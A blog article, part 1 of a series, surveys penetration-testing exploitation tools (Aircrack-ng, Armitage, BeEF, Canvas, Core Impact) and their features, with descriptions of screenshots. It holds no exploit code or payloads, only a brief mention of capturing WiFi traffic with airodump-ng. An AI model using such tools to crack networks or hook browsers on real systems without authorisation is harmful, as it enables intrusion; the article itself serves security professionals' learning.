Categories
Apps & Packages

Exploitation Tools (part 1)

Today we take a look at some tools available for the exploitation of vulnerabilities whilst performing Pentesting or Ethical Hacking.

Recently we published a Poll for voting for the Best Exploitation Tool. In this article we look at the first 6 of those choices to help understand what they do, their main features, some examples, and where to find out more about them.

Aircrack-ng

Aircrack-ng is not a single tool but rather a suite of around 20 tools focused on testing WiFi networks.

Here are the areas covered:

  • Monitoring – capturing packets and saving this data to text files for processing by other 3rd party tools.
  • Attacking – issue replay attacks, deauthentications, create fake Access Points (AP’s), and other forms of packet injection attacks.
  • Testing – checking Wireless Adapters and driver capabilities such as capturing and injections.
  • Cracking – WEP (Wired Equivalent Privacy) & WPA-PSK (Wi-Fi Protected Access Pre-Shared Key).

All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

aircrack-ng.org
Example of preparing a Wireless Adapter for using most of the tools within the ‘aircrack-ng’ suite. Steps include changing the MAC Address and placing it into Monitor mode.
Example of using ‘airodump-ng wlan0’ command to capture WiFi traffic information. MAC Addresses (BSSID) and Access Point names (Probe) have been blurred for privacy.

For further details on Aircrack-ng checkout the following resources:

Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

fastandeasyhacking.com

Below are the advantages provided by using Armitage over a single instance of Metasploit:

Through one Metasploit instance, your team will:

  • Use the same sessions.
  • Share hosts, captured data, and downloaded files.
  • Communicate through a shared event log.
  • Run bots to automate red team tasks.
Sample screenshot of Armitage tool front-end courtesy of fastandeasyhacking.com.

Note: This software has not been updated since 2015. Links in the following section may cause a browser security warning!

For further details on Armitage checkout the following resources:

BeEF

BeEF stands for ‘The Browser Exploitation Framework’ which is a penetration testing tool targeting web browsers.

…BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

…BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

beefproject.com
Example of attacker screen showing online & offline browsers in first column. Target is the Basic Demo (see 2nd tab). Second column shows available modules (attack vectors). Third column shows individual attacks with results in the last column.
Resultant attack of sending an alert popup dialog to the ‘hooked’ target.
Example of a different attack to retrieve target’s web page source HTML.

For further details on BeEF checkout the following resources:

Canvas

Immunity’s CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide.

immunitysec.com
Example of Canvas being able to use multiple hosts running different operating systems on a variety of hardware as pivot points when carrying out attacks.
Canvas can be used both by GUI (see above) or CLI (Command Line Interface) in this screenshot.

The above screenshots are courtesy of ImmunitySec.com.

For further details on Canvas checkout the following resources:

Core Impact

Core Impact is designed to enable security teams to conduct advanced penetration tests with ease. With guided automation and certified exploits, the powerful penetration testing software enables you to safely test your environment using the same techniques as today’s adversaries.

coresecurity.com

Key features:

  • Guided Automation – RPTs (Rapid Penetration Tests) are designed to automate common & repetitive tasks.
  • Certified Exploits – exploits are validated and held in a library that is updated in real-time. 3rd party exploits are also included.
  • Multi-Vector Testing Capabilities – attacks can be performed across network infrastructure, endpoints, the web, and applications to reveal exploited vulnerabilities.
  • Integrations – Core Impact integrates with a variety of pentesting tools and scanners such as Metasploit, Burp Suite, and OpenVAS.
  • Patented Agents – Core Agents simplify interactions with remote hosts.
  • Robust Error Prevention – this enables agents such as products, workspaces, modules/RPTs to be programmed to self-destruct after testing to save resources and close potential backdoors.
  • Teaming – this allows multiple Pentesters to interact within the same session to share data and delegate testing tasks.

For further details on Core Impact checkout the following resources:


If you have not yet voted in our poll then please check out the Best Exploitation Tool page.

Check back soon for our upcoming part 2 of this article.

If you have any questions or comments on the above please feel free to add them below.

Leave a Reply